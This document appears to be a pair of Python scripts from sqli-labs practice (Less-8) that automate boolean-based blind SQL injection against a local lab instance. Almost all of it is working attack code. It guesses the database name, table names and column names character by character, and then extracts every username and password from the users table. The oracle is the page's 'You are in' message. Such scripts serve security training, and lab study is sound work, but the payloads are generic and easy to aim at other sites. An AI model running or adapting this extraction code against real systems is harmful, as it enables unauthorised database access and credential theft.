import requests
def decide():
    """Probe how many decimal digits the length of the current database name has.

    Each iteration issues one boolean-based blind SQL injection request to the
    local sqli-labs Less-8 page; the substring 'You are in...........' in the
    response body is the true/false oracle. Returns the first ``i`` in 0..9 for
    which the oracle fires, i.e. the value of
    substr(length(length(database())), 1, 1). If no candidate matches the loop
    falls through and the function returns None.
    """
    for i in range(10):
        # One GET per candidate digit. Every probe carries the literal
        # "' and if(" / "--+" fragments in the id parameter, which is the kind of
        # pattern a WAF rule or access-log review would key on.
        response = requests.request('get',f"http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)={i}, 1, 0)--+")
        if 'You are in...........' in response.text:
            return i
def ruler(size):
    """Recover length(database()) one decimal digit at a time.

    Args:
        size: number of digits to recover (the value returned by ``decide``).

    Returns:
        The recovered digits concatenated and converted with ``int``.

    Raises:
        TypeError: if ``size`` is None (``decide`` found no matching digit).
        ValueError: if no digit matched for any position, so ``result`` is ''.
    """
    result = ''
    for i in range(1, size + 1):
        for j in range(10):
            # Oracle probe: "is digit i of length(database()) equal to j?"
            response = requests.request('get',f"http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(substr(length(database()), {i}, 1)={j}, 1, 0)--+")
            if 'You are in...........' in response.text:
                result += str(j)
                break
    return int(result)
# Driver: first learn how many digits the length has, then the length itself.
# Nothing here checks for decide() returning None before it is passed on.
size = decide()
length = ruler(size)
#print(size)
#print(decide())
print(length)
得到数据库长度以及数据库的名称
速度比较慢
import requests
import string
# Target is a local sqli-labs instance (Less-8, boolean-based blind); the same
# response marker 'You are in...........' serves as the oracle throughout.
url = 'http://127.0.0.1/sqli-labs-master/Less-8/'
i = 0
db_name_len = 0
print('[+]正在猜解数据库长度......')
# Stage 1: linear search for length(database()), one request per candidate.
while True:
    payload = url + "?id=1'and length(database())=%d--+" % i
    res = requests.get(payload)
    # print(payload)
    if 'You are in...........' in res.text:
        db_name_len = i
        print('数据库长度为:' + str(db_name_len))
        break
    if i == 30:
        # Give up after candidates 0..30; db_name_len then stays 0.
        print('error!')
        break
    i += 1
print("[+]正在猜解数据库名字......")
db_name = ''
# Stage 2: recover database() character by character. Only a-z is tried, so a
# position holding any other character produces no match and is skipped.
for i in range(1, db_name_len + 1):
    # print(i)
    for k in string.ascii_lowercase:
        # print(k)
        payload = url + "?id=1'and substr(database(),%d,1)='%s'--+" % (i, k)
        res = requests.get(payload)
        # print(payload)
        if 'You are in...........' in res.text:
            db_name += k
            # print(db_name)
            break
print("数据库为: %s" % db_name)
# Guess how many tables there are
print("[+]正在猜解表的数量......")
tab_num = 0
# Stage 3: count tables in the hard-coded schema 'security' (the recovered
# db_name is only used for the printout). There is no upper bound here: if the
# oracle never fires, this loop does not terminate.
while True:
    payload = url + "?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+" % tab_num
    res = requests.get(payload)
    if 'You are in...........' in res.text:
        print("%s数据库共有" % db_name + str(tab_num) + "张表")
        break
    else:
        tab_num += 1
print("[+]开始猜解表名......")
# Stage 4: for every table in 'security' recover its name, then the count,
# lengths and names of its columns. Each table is addressed by offset via
# "limit i-1,1"; each column by "limit a-1,1".
for i in range(1, tab_num + 1):
    tab_len = 0
    # Length of table name i (linear search, capped at 30).
    while True:
        payload = url + "?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+" % (
            i - 1, tab_len)
        res = requests.get(payload)
        # print(payload)
        if 'You are in...........' in res.text:
            # print ('第%d张表长度为:'%i+str(tab_len))
            break
        if tab_len == 30:
            print('error!')
            break
        tab_len += 1
    tab_name = ''
    # Characters of table name i; a-z only. This inner loop has no break, so all
    # 26 candidates are requested for every position.
    for j in range(1, tab_len + 1):
        for m in string.ascii_lowercase:
            payload = url + "?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+" % (
                i - 1, j, m)
            res = requests.get(payload)
            if 'You are in...........' in res.text:
                tab_name += m
                # print (tab_name)
    print("[-]第%d张表名为: %s" % (i, tab_name))
    # Try to guess the columns under this table......
    dump_num = 0
    # Column count; the filter is by table_name only, not by schema, and the
    # loop is unbounded.
    while True:
        payload = url + "?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+" % (
            tab_name, dump_num)
        res = requests.get(payload)
        if 'You are in...........' in res.text:
            print("%s表下有%d个字段" % (tab_name, dump_num))
            break
        dump_num += 1
    for a in range(1, dump_num + 1):
        dump_len = 0
        # Length of column a (capped at 30).
        while True:
            payload = url + "?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+" % (
                tab_name, a - 1, dump_len)
            res = requests.get(payload)
            # print(payload)
            if 'You are in...........' in res.text:
                # print("第%d个字段长度为%d"%(a,dump_len))
                break
            dump_len += 1
            if dump_len == 30:
                print("error!!")
                break
        dump_name = ''
        # Characters of column a; alphabet is a-z plus '_' and '-'. Note this
        # loop reuses the name `i`, shadowing the outer table index; harmless
        # here only because nothing reads `i` after this loop within the same
        # outer iteration and the outer `for` rebinds it on its next pass.
        for i in range(1, dump_len + 1):
            for j in (string.ascii_lowercase + '_-'):
                payload = url + "?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+" % (
                    tab_name, a - 1, i, j)
                res = requests.get(payload)
                if 'You are in...........' in res.text:
                    dump_name += j
                    # print(dump_name)
                    break
        print(dump_name)
print("[+]开始猜解users表下的username......")
usn_num = 0
# Candidate alphabet for username characters (letters, digits, '_' and '-').
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
# Stage 5: row count of security.users. From here on the oracle is the shorter
# substring "You are in" rather than the dotted marker used above; the loop is
# unbounded.
while True:
    payload = url + "?id=1'and (select count(username) from security.users)=%d--+" % usn_num
    res = requests.get(payload)
    if "You are in" in res.text:
        # print(usn_num)#13
        break
    usn_num += 1
for i in range(1, usn_num + 1):
    usn_len = 0
    # Length of username in row i (unbounded linear search).
    while True:
        payload = url + "?id=1'and (select length(username) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
        res = requests.get(payload)
        if "You are in" in res.text:
            # print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len += 1
    usr_name = ''
    # Characters of username i, first matching candidate per position.
    for k in range(1, usn_len + 1):
        for m in char:
            payload = url + "?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+" % (
                i - 1, k, m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name += m
                break
    print(usr_name)
print("[+]开始猜解users表下的password......")
usn_num = 0
# Same procedure as the username stage, against the password column; the
# alphabet additionally includes '@' and '!'. The variable names usn_num,
# usn_len and usr_name are reused from the previous stage.
char = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
# Row count of security.users, counted over the password column (unbounded).
while True:
    payload = url + "?id=1'and (select count(password) from security.users)=%d--+" % usn_num
    res = requests.get(payload)
    if "You are in" in res.text:
        # print(usn_num)#13
        break
    usn_num += 1
for i in range(1, usn_num + 1):
    usn_len = 0
    # Length of the password value in row i (unbounded linear search).
    while True:
        payload = url + "?id=1'and (select length(password) from security.users limit %d,1)=%d--+" % (i - 1, usn_len)
        res = requests.get(payload)
        if "You are in" in res.text:
            # print("第%d的长度为%d"%(i,usn_len))
            break
        usn_len += 1
    usr_name = ''
    # Characters of the value in row i; any character outside `char` is skipped.
    for k in range(1, usn_len + 1):
        for m in char:
            payload = url + "?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+" % (
                i - 1, k, m)
            res = requests.get(payload)
            if "You are in" in res.text:
                usr_name += m
                break
    print(usr_name)